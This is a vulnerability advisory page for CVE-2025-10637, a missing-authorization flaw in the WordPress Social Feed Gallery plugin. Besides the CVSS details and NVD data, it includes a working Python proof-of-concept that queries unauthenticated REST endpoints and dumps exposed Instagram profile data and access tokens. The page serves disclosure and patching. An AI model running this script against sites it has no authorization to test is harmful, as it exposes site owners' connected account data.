CVE-2025-10637

Description

The Social Feed Gallery plugin for WordPress is vulnerable to Information Exposure in versions less than, or equal to, 4.9.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to exfiltrate Instagram profile and media data from any account the site owner connected to their site.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Social Feed Gallery (insta-gallery) <= 4.9.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10637 PoC - Unauthenticated Information Disclosure
# Target: WordPress sites with Social Feed Gallery plugin <= 4.9.2

import requests
import json
import sys
from urllib.parse import urljoin

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-10637
    Tests the exposed REST API endpoint for information disclosure
    """
    
    # Vulnerable endpoint path
    endpoints = [
        '/wp-json/insta-gallery/v1/user-profile',
        '/wp-json/insta-gallery/v1/frontend/user-profile',
        '/?rest_route=/insta-gallery/v1/user-profile',
        '/?rest_route=/insta-gallery/v1/frontend/user-profile'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json',
        'Content-Type': 'application/json'
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-10637 - Social Feed Gallery Information Disclosure\n")
    
    for endpoint in endpoints:
        url = urljoin(target_url.rstrip('/'), endpoint)
        print(f"[+] Testing endpoint: {endpoint}")
        
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            if response.status_code == 200:
                data = response.json()
                print(f"[✓] Vulnerable! Endpoint returned data:")
                print(json.dumps(data, indent=2, ensure_ascii=False))
                
                # Check for sensitive information exposure
                if 'username' in str(data) or 'access_token' in str(data) or 'profile' in str(data).lower():
                    print("\n[!] CRITICAL: Sensitive Instagram data exposed!")
                    return True
            elif response.status_code == 401:
                print(f"[-] Protected endpoint (401 Unauthorized)")
            else:
                print(f"[-] No data (Status: {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Request error: {e}")
        except json.JSONDecodeError:
            print(f"[-] Non-JSON response")
    
    print("\n[*] No vulnerable endpoints found")
    return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10637.py <target_url>")
        print("Example: python cve-2025-10637.py https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    is_vulnerable = check_vulnerability(target)
    
    if is_vulnerable:
        print("\n[✓] Target is VULNERABLE to CVE-2025-10637")
        print("[!] Recommended action: Update Social Feed Gallery to version 4.9.3 or later")
    else:
        print("\n[-] Target appears NOT vulnerable or plugin not installed")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10637
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10637
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10637/
[4] VulDB https://vuldb.com/cve/CVE-2025-10637
[5] https://plugins.trac.wordpress.org/browser/insta-gallery/tags/4.9.2/lib/api/rest/endpoints/frontend/class-user-profile.php#L19
[6] https://plugins.trac.wordpress.org/changeset/3381423/insta-gallery/trunk/lib/api/rest/endpoints/frontend/class-user-profile.php
[7] https://wordpress.org/plugins/insta-gallery/
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0dd6b0-9028-456e-9843-d45754c01c53?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10637", "sourceIdentifier": "[email protected]", "published": "2025-10-25T07:15:39.797", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Feed Gallery plugin for WordPress is vulnerable to Information Exposure in versions less than, or equal to, 4.9.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to exfiltrate Instagram profile and media data from any account the site owner connected to their site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/insta-gallery/tags/4.9.2/lib/api/rest/endpoints/frontend/class-user-profile.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3381423/insta-gallery/trunk/lib/api/rest/endpoints/frontend/class-user-profile.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/insta-gallery/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0dd6b0-9028-456e-9843-d45754c01c53?source=cve", "source": "[email protected]"}]}}